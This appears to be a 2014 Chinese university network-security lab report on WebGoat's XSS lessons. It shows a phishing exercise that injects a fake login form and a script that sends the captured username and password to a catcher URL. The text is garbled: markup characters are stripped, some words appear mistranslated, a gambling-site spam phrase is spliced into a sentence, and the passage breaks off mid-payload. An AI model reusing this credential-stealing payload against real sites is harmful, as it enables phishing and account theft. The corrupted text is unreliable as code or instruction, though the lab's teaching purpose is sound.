网络攻防-第五次实验.doc

四川大学软件学院

实验报告

学院：软件学院

专业：软件工程

年级：2011

姓名：张治毅

学号：1143111116

提交时间：2014年4月24日

评阅意见及成绩：

..

实验工程：Cross-SiteScripting(XSS，跨站脚本攻击)

实验工程名称：Cross-SiteScripting(XSS，跨站脚本攻击)

实验工程目的：

1.PhishingwithXSS〔网络钓鱼与XSS〕

2.LAB:CrossSiteScripting〔实验室：跨站脚本〕

3.StoredXSSAttacks〔存储式XSS攻击〕

4.CrossSiteRequestForgery(CSRF)〔跨站请求伪造〕

5.ReflectedXSSAttacks〔反射式XSS攻击〕

6.OnlyTest〔Only测试〕

7.CrossSiteTracing(XST)Attacks〔跨站跟踪攻击〕

实验环境：Windowsxp,firefoxbrowser

实验内容：

PhishingwithXSS〔网络钓鱼与XSS〕

课程目的

这是一个很好的验证效劳器端所有输入的练习。如果一个未经验证的用户输入一个响应时，XSS就可能发生。利用XSS你就可以进行钓鱼攻击，在一个页面中添加一个仿官方的页面。访问该页面的受害人很难去区分这个页面的内容是不是恶意的。

利用XSS可以在已存在的页面中进一步添加元素。该解决方案包括两局部，你需要结合起来：

1.受害人填写一个表格

2.脚本读取的形式，收集到的信息发送给攻击者。

一个带用户名密码的表格如下：

form

brbrHRH3Thisfeaturerequiresaccountlogin:/H3brbr

EnterUsername:brinputtype=textid=username=userbr

EnterPassword:brinputtype=passwordname=passbr

/formbrbrHR

有哪些信誉好的足球投注网站这段代码，你就能看到页面中增加了一个表单。

现在你需要一段脚本：

script

functionhack()

{alert(Hadthisbeenarealattack...Yourcredentialswerejuststolen.UserName=+

document.forms[0].user.value+Password=+document.forms[0].pass.value);XSSImage=newImage;

XSSImage.src=://localhost/WebGoat/catcher?PROPERTY=yesuser=+document.forms[0].user.value+

password=+document.forms[0].pass.value+;

}

/script

这段代码会读取你在表单上输入的用户名和密码信息，将这些信息发送给捕获这些信息的

WebGoat。

最后，就是要将这两段代码合并。最终需要输入的代码如下：

scriptfunctionhack(){alert(Hadthisbeenarealattack...Yourcredentialswerejuststolen.UserName=+

document.forms[0].user.value+Password=+document.forms[0].pass.value);XSSImage=newImage;

XSSImage.src=://localhost/WebGoat/catche